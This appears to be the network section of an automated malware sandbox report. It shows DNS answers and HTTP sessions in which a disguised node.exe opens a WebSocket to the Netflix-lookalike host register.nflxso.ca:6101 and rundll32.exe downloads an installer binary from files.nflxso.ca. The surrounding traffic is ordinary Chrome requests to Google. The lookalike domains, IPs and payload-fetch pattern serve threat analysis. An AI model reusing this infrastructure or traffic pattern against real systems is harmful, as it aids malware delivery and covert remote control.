| May 1, 2024 11:08:05.760641098 CEST | 1.1.1.1 | 192.168.2.4 | 0x5b32 | No error (0) | files.nflxso.ca | | 172.67.152.151 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:05.760641098 CEST | 1.1.1.1 | 192.168.2.4 | 0x5b32 | No error (0) | files.nflxso.ca | | 104.21.1.239 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:12.184945107 CEST | 1.1.1.1 | 192.168.2.4 | 0xb4f9 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false |
| May 1, 2024 11:08:12.184963942 CEST | 1.1.1.1 | 192.168.2.4 | 0xaec4 | No error (0) | www.google.com | | 142.251.16.147 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:12.184963942 CEST | 1.1.1.1 | 192.168.2.4 | 0xaec4 | No error (0) | www.google.com | | 142.251.16.104 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:12.184963942 CEST | 1.1.1.1 | 192.168.2.4 | 0xaec4 | No error (0) | www.google.com | | 142.251.16.103 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:12.184963942 CEST | 1.1.1.1 | 192.168.2.4 | 0xaec4 | No error (0) | www.google.com | | 142.251.16.105 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:12.184963942 CEST | 1.1.1.1 | 192.168.2.4 | 0xaec4 | No error (0) | www.google.com | | 142.251.16.106 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:12.184963942 CEST | 1.1.1.1 | 192.168.2.4 | 0xaec4 | No error (0) | www.google.com | | 142.251.16.99 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:17.896565914 CEST | 1.1.1.1 | 192.168.2.4 | 0xb119 | No error (0) | apis.google.com | plus.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false |
| May 1, 2024 11:08:17.897937059 CEST | 1.1.1.1 | 192.168.2.4 | 0x31fd | No error (0) | apis.google.com | plus.l.google.com | | CNAME (Canonical name) | IN (0x0001) | false |
| May 1, 2024 11:08:17.897937059 CEST | 1.1.1.1 | 192.168.2.4 | 0x31fd | No error (0) | plus.l.google.com | | 172.253.122.101 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:17.897937059 CEST | 1.1.1.1 | 192.168.2.4 | 0x31fd | No error (0) | plus.l.google.com | | 172.253.122.138 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:17.897937059 CEST | 1.1.1.1 | 192.168.2.4 | 0x31fd | No error (0) | plus.l.google.com | | 172.253.122.102 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:17.897937059 CEST | 1.1.1.1 | 192.168.2.4 | 0x31fd | No error (0) | plus.l.google.com | | 172.253.122.139 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:17.897937059 CEST | 1.1.1.1 | 192.168.2.4 | 0x31fd | No error (0) | plus.l.google.com | | 172.253.122.113 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:17.897937059 CEST | 1.1.1.1 | 192.168.2.4 | 0x31fd | No error (0) | plus.l.google.com | | 172.253.122.100 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:54.282963991 CEST | 1.1.1.1 | 192.168.2.4 | 0x7b8a | No error (0) | register.nflxso.ca | | 74.201.73.52 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:08:54.282963991 CEST | 1.1.1.1 | 192.168.2.4 | 0x7b8a | No error (0) | register.nflxso.ca | | 147.182.137.203 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:14.202194929 CEST | 1.1.1.1 | 192.168.2.4 | 0xd376 | No error (0) | register.nflxso.ca | | 74.201.73.52 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:14.202194929 CEST | 1.1.1.1 | 192.168.2.4 | 0xd376 | No error (0) | register.nflxso.ca | | 147.182.137.203 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:16.134525061 CEST | 1.1.1.1 | 192.168.2.4 | 0xe0eb | No error (0) | www.google.com | | 172.253.62.104 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:16.134525061 CEST | 1.1.1.1 | 192.168.2.4 | 0xe0eb | No error (0) | www.google.com | | 172.253.62.99 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:16.134525061 CEST | 1.1.1.1 | 192.168.2.4 | 0xe0eb | No error (0) | www.google.com | | 172.253.62.105 | A (IP address) | IN (0x0001) | false |
| May 1, 2024 11:09:16.134525061 CEST | 1.1.1.1 | 192.168.2.4 | 0xe0eb | No error (0) | www.google.com | | 172.253.62.106 | A (IP address) | IN (0x0001) | false |
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST1.1.1.1192.168.2.40xe0ebNo error (0)www.google.com172.253.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134525061 CEST1.1.1.1192.168.2.40xe0ebNo error (0)www.google.com172.253.62.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:16.134911060 CEST1.1.1.1192.168.2.40xfbd9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:27.787480116 CEST1.1.1.1192.168.2.40x88f2No error (0)register.nflxso.ca74.201.73.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:27.787480116 CEST1.1.1.1192.168.2.40x88f2No error (0)register.nflxso.ca147.182.137.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:57.805550098 CEST1.1.1.1192.168.2.40xb277No error (0)register.nflxso.ca74.201.73.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                            May 1, 2024 11:09:57.805550098 CEST1.1.1.1192.168.2.40xb277No error (0)register.nflxso.ca147.182.137.203A (IP address)IN (0x0001)false
                                                                                                                                                                                                            • files.nflxso.ca
                                                                                                                                                                                                            • www.google.com
                                                                                                                                                                                                            • apis.google.com
                                                                                                                                                                                                            • fs.microsoft.com
                                                                                                                                                                                                            • slscr.update.microsoft.com
                                                                                                                                                                                                            • register.nflxso.ca:6101
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49757 | 74.201.73.52 | 6101 | 8964 | C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 11:08:54.387012005 CEST | 237 | OUT | GET /strvn HTTP/1.1
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: R0PH52ZGGW4pHocLPSKo4A==
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Host: register.nflxso.ca:6101
May 1, 2024 11:08:54.507878065 CEST | 183 | IN | HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: YVu3JLflsutW2ZDAeo1ncGhfbf0=
Date: Wed, 01 May 2024 09:08:53 GMT
uWebSockets: 20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49758 | 172.67.152.151 | 80 | 8964 | C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\node.exe
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 11:08:57.438606024 CEST | 186 | OUT | GET /downloads/winapp/latest-version.txt HTTP/1.1
user-agent: got (https://github.com/sindresorhus/got)
accept-encoding: gzip, deflate, br
Host: files.nflxso.ca
Connection: close
May 1, 2024 11:08:57.592268944 CEST | 829 | IN | HTTP/1.1 301 Moved Permanently
Date: Wed, 01 May 2024 09:08:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: https://files.nflxso.ca/downloads/winapp/latest-version.txt
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCwjHbzT4tXkwj9CPfghixS5o%2B3CFzpWSvdf73MFQD%2F10htxa5DDyRZ9cAPGIwH6BgTq0KHBEwug76b9LtGZtRooa16cwxuj70ZWioje3HD%2FFUL0jFapNcvR0RKwZ2oQ45k%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cea1434d6e81e8-IAD
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
May 1, 2024 11:08:57.592288017 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 172.67.152.151 | 443 | 7608 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:06 UTC | 179 | OUT | GET /downloads/winapp/latest-installer.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows) WinHTTP/Gecko Chrome/9999999
Host: files.nflxso.ca
2024-05-01 09:08:06 UTC | 692 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 09:08:06 GMT
Content-Type: application/octet-stream
Content-Length: 7055674
Connection: close
last-modified: Wed, 23 Nov 2022 20:15:22 GMT
etag: "637e7f5a-6ba93a"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTDzoGh%2FqbMYtqlZJBTtkezd8cCixkxBIcFssLMuG5bUGAL0UaeoG6TUIh1cCy9%2FlwqeTmc5CUnRrPWIa96y4%2BX4mWloVqGGsH6E4VrHlwi3ZkSGa1naV3fg6rtaF%2BGPZuA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cea0033cbd2076-IAD
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            Data Ascii: Ph@S@SSD$$SPSt$(D$4D$@@j.;tVj%SSStVjL@uj=GtD$t$p@@V5 @tP@@tP@)jhM ^V5fCt$V6Yu^V5fCjtW6wh@W(@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 142.251.16.147 | 443 | 8000 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:13 UTC | 518 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2024-05-01 09:08:13 UTC | 1479 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Version: 628208705
                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:13 GMT
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            Cache-Control: private
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49737 | 142.251.16.147 | 443 | 8000 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:13 UTC | 615 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2024-05-01 09:08:13 UTC | 1703 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:13 GMT
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ZUTeVFXGY6ssCH-4qff7pA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49736 | 142.251.16.147 | 443 | 8000 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:13 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2024-05-01 09:08:13 UTC | 1479 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Version: 628208705
                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:13 GMT
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            Cache-Control: private
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Data Ascii: ipXYfFNTU9pq9iO8D8nq0Apsjq8oVhI1hwx6L4OeyYzxF2uYnk3e8Xq7Jya6by3i85JYMoYj2bc5urmhXKqvfh3CSF5hoEk4kJkMxL6EvIzJAAO3D7SHUFWdOEboDLhD0EEdCg0glGsSk6dnMBT6t9DEwO8lPilHwUoS0NJpRM8Q9FPYewf5gMAeppulIYI6MODrszp3P17rOe3TIA4FMTvDmJ30qwXvuM3mlRdpPdafpFVRXMR0DStxikirNYI
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 5a 68 67 31 4e 67 46 59 4a 5a 50 2f 50 2b 39 72 41 72 4a 6a 6e 32 4d 66 48 42 6f 7a 45 7a 2f 2f 6e 36 33 31 65 34 68 4e 78 55 49 39 30 44 73 59 37 38 65 66 75 62 48 5a 61 4a 48 32 5a 58 74 64 64 6f 39 4b 56 6c 74 55 49 61 6b 6b 33 4d 43 41 71 39 53 72 4a 71 4a 68 47 33 65 61 50 41 33 6f 6b 6f 6f 5a 37 56 32 74 4f 65 66 4c 79 54 68 59 66 50 34 4b 35 7a 75 4d 6e 34 64 65 68 37 74 50 76 77 2b 36 39 66 36 38 51 52 6c 4f 72 47 37 6a 6a 64 48 78 6f 74 41 6f 42 4b 6a 53 63 67 6e 34 54 78 7a 63 58 43 70 6e 53 4e 31 38 64 75 41 66 6f 59 37 66 75 6f 6b 7a 72 67 73 77 64 45 44 6b 42 78 33 33 53 50 70 6d 32 6d 47 6c 69 2b 52 53 49 4e 44 54 6b 5a 68 42 7a 6b 43 58 4c 2b 50 2f 51 38 53 53 54 4b 6a 46 38 4a 7a 4c 30 74 4f 50 66 57 62 7a 78 62 35 43 6c 6a 49 53 65 73 58
                                                                                                                                                                                                            Data Ascii: Zhg1NgFYJZP/P+9rArJjn2MfHBozEz//n631e4hNxUI90DsY78efubHZaJH2ZXtddo9KVltUIakk3MCAq9SrJqJhG3eaPA3okooZ7V2tOefLyThYfP4K5zuMn4deh7tPvw+69f68QRlOrG7jjdHxotAoBKjScgn4TxzcXCpnSN18duAfoY7fuokzrgswdEDkBx33SPpm2mGli+RSINDTkZhBzkCXL+P/Q8SSTKjF8JzL0tOPfWbzxb5CljISesX


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49735 | 142.251.16.147 | 443 | 8000 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:13 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
2024-05-01 09:08:13 UTC | 1434 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Version: 628208705
                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:13 GMT
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            Cache-Control: private
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
2024-05-01 09:08:13 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-05-01 09:08:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49745 | 172.253.122.101 | 443 | 8000 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-01 09:08:18 UTC | 741 | OUT | GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                            Host: apis.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
